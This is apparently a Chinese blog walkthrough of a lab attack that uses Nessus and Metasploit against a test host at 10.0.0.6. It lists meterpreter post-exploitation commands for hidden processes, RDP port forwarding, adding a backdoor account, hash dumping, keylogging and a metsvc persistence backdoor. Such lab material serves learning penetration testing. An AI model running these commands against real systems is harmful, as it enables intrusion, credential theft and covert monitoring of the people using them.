Nessus+Metasploit
1、环境
受害者IP:10.0.0.6
2、攻击
首先使用Nessus进行扫描
扫描结果
我们将结果导出来,然后导入msfconsole中
使用vulns进行漏洞分析
查找对应的漏洞
使用漏洞进行攻击
这时候我们就获得了一个meterpreter
3、控制后门
测试是否是虚拟机:
迁移进程,防止当前进程被删除
ps:查看进程
migrate pid:迁移进程
execute –H –i –f cmd.exe:创建新进程,-H不可见,-i交互
getpid:获取进程号
getuid:查看权限
sysinfo:系统信息
端口转发
portfwd add –l 5678 –p 3389 –r 10.0.0.6:将受害者的3389转发到本机5678
run getgui –u hack –p hack:添加账户
rdesktop –u hack –p hack 10.0.0.6:3389:如果转发了就连接本地
获取hash
键盘监听
keyscan_start:启动监听
keyscan_stop:停止
keyscan_dump:查看
后门一:metsvc
然后使用
我这里失败了,原因是tcp/ip状态为FIN_WAIT_2(跟网络环境有关,如果哪位大牛知道如何解决,请告诉我!)
郑重声明:本站内容如果来自互联网及其他传播媒体,其版权均属原媒体及文章作者所有。转载目的在于传递更多信息及用于网络分享,并不代表本站赞同其观点和对其真实性负责,也不构成任何其他建议。